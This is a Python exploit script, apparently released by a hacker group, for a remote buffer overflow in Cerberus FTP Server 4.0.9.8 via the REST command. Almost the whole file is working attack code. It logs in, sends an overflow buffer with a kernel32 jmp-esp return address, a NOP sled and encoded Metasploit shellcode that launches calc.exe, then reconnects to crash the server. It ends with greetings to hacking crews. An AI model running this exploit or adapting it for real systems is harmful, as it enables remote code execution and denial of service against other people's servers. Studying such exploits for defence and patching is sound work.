#!/usr/bin/python
# Cerberus FTP Server 4.0.9.8 (REST) Remote BOF and Crash Exploit
# Provided by : KedAns-Dz * Inj3ct0r Team
import errno
from os import strerror
from socket import *
import sys
from time import sleep
from struct import pack
if len(sys.argv) != 3:
print "[*]Usage: python %s <ip> <port>" % sys.argv[0]
print "[*]Exemple: python %s 192.168.1.2 21" % sys.argv[0]
sys.exit(0)
ip = sys.argv[1]
port = int(sys.argv[2])
# windows/exec | cmd=calc.exe | x86/alpha_mixed (http://metasploit.com)
shellcode = ("\x56\x54\x58\x36\x33\x30\x56\x58\x48\x34\x39\x48\x48\x48"
"\x50\x68\x59\x41\x41\x51\x68\x5a\x59\x59\x59\x59\x41\x41"
"\x51\x51\x44\x44\x44\x64\x33\x36\x46\x46\x46\x46\x54\x58"
"\x56\x6a\x30\x50\x50\x54\x55\x50\x50\x61\x33\x30\x31\x30"
"\x38\x39\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41"
"\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42"
"\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x49\x6c\x4b"
"\x58\x4e\x69\x43\x30\x43\x30\x43\x30\x43\x50\x4f\x79\x4b"
"\x55\x45\x61\x4e\x32\x43\x54\x4c\x4b\x42\x72\x50\x30\x4c"
"\x4b\x42\x72\x44\x4c\x4e\x6b\x43\x62\x42\x34\x4c\x4b\x43"
"\x42\x45\x78\x46\x6f\x4d\x67\x51\x5a\x51\x36\x50\x31\x49"
"\x6f\x50\x31\x4b\x70\x4c\x6c\x45\x6c\x43\x51\x51\x6c\x47"
"\x72\x46\x4c\x51\x30\x49\x51\x4a\x6f\x46\x6d\x47\x71\x4a"
"\x67\x4a\x42\x4a\x50\x46\x32\x51\x47\x4c\x4b\x43\x62\x44"
"\x50\x4e\x6b\x42\x62\x45\x6c\x47\x71\x4e\x30\x4c\x4b\x47"
"\x30\x50\x78\x4e\x65\x49\x50\x50\x74\x51\x5a\x46\x61\x4e"
"\x30\x50\x50\x4c\x4b\x51\x58\x45\x48\x4e\x6b\x43\x68\x45"
"\x70\x47\x71\x4b\x63\x4a\x43\x45\x6c\x47\x39\x4c\x4b\x47"
"\x44\x4c\x4b\x46\x61\x48\x56\x50\x31\x49\x6f\x46\x51\x4f"
"\x30\x4e\x4c\x4b\x71\x4a\x6f\x44\x4d\x47\x71\x4a\x67\x44"
"\x78\x49\x70\x44\x35\x48\x74\x45\x53\x51\x6d\x4a\x58\x45"
"\x6b\x51\x6d\x44\x64\x44\x35\x48\x62\x51\x48\x4e\x6b\x51"
"\x48\x47\x54\x43\x31\x4b\x63\x43\x56\x4e\x6b\x46\x6c\x42"
"\x6b\x4c\x4b\x43\x68\x47\x6c\x46\x61\x4a\x73\x4e\x6b\x43"
"\x34\x4e\x6b\x47\x71\x48\x50\x4c\x49\x51\x54\x51\x34\x45"
"\x74\x43\x6b\x43\x6b\x50\x61\x46\x39\x51\x4a\x42\x71\x4b"
"\x4f\x4d\x30\x50\x58\x51\x4f\x50\x5a\x4e\x6b\x46\x72\x4a"
"\x4b\x4b\x36\x43\x6d\x51\x7a\x46\x61\x4e\x6d\x4f\x75\x4d"
"\x69\x43\x30\x47\x70\x45\x50\x50\x50\x42\x48\x44\x71\x4c"
"\x4b\x50\x6f\x4b\x37\x4b\x4f\x4a\x75\x4f\x4b\x4a\x50\x4d"
"\x65\x4e\x42\x42\x76\x50\x68\x4e\x46\x4e\x75\x4f\x4d\x4d"
"\x4d\x4b\x4f\x4e\x35\x47\x4c\x44\x46\x51\x6c\x44\x4a\x4d"
"\x50\x49\x6b\x49\x70\x42\x55\x46\x65\x4f\x4b\x47\x37\x45"
"\x43\x51\x62\x50\x6f\x42\x4a\x47\x70\x50\x53\x49\x6f\x49"
"\x45\x50\x63\x51\x71\x42\x4c\x42\x43\x46\x4e\x50\x65\x51"
"\x68\x43\x55\x45\x50\x41\x41")
buf = "\x41" * 244
buf += pack('<L',0x7C874413) # jmp esp - from (kernel32.dll)
buf += "\x90" * 50
buf += shellcode
print "[+]Connecting with server..."
sleep(1)
try:
s = socket(AF_INET,SOCK_STREAM)
s.connect((ip,port))
s.recv(1024)
s.send("USER test\r\n")
s.recv(1024)
s.send("PASS test\r\n")
s.recv(1024)
s.send("REST "+buf+"\r\n")
s.close()
s = socket(AF_INET,SOCK_STREAM)
s.connect((ip,port))# Connected again to Crash and BOF
sleep(1)
s.close()# Close connection and Crash!!!
print "[+]Exploit sent with sucess"
except:
print "[-]Error in connection with server: "+ip
#=====[ The End ]=======|
#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=====================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > + Rizky Ariestiyansyah * Islam Caddy <3
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * SeeMe * XroGuE * ZoRLu * gunslinger_
# anT!-Tr0J4n * ^Xecuti0N3r * Kalashinkov3 (www.1337day.com/team) * Dz Offenders Cr3w * Sec4ever
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X
# Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * H-KinG * www.packetstormsecurity.org * TreX (hotturks.org)
# www.metasploit.com * UE-Team & I-BackTrack * r00tw0rm.com * All Security and Exploits Webs ..
#=================================================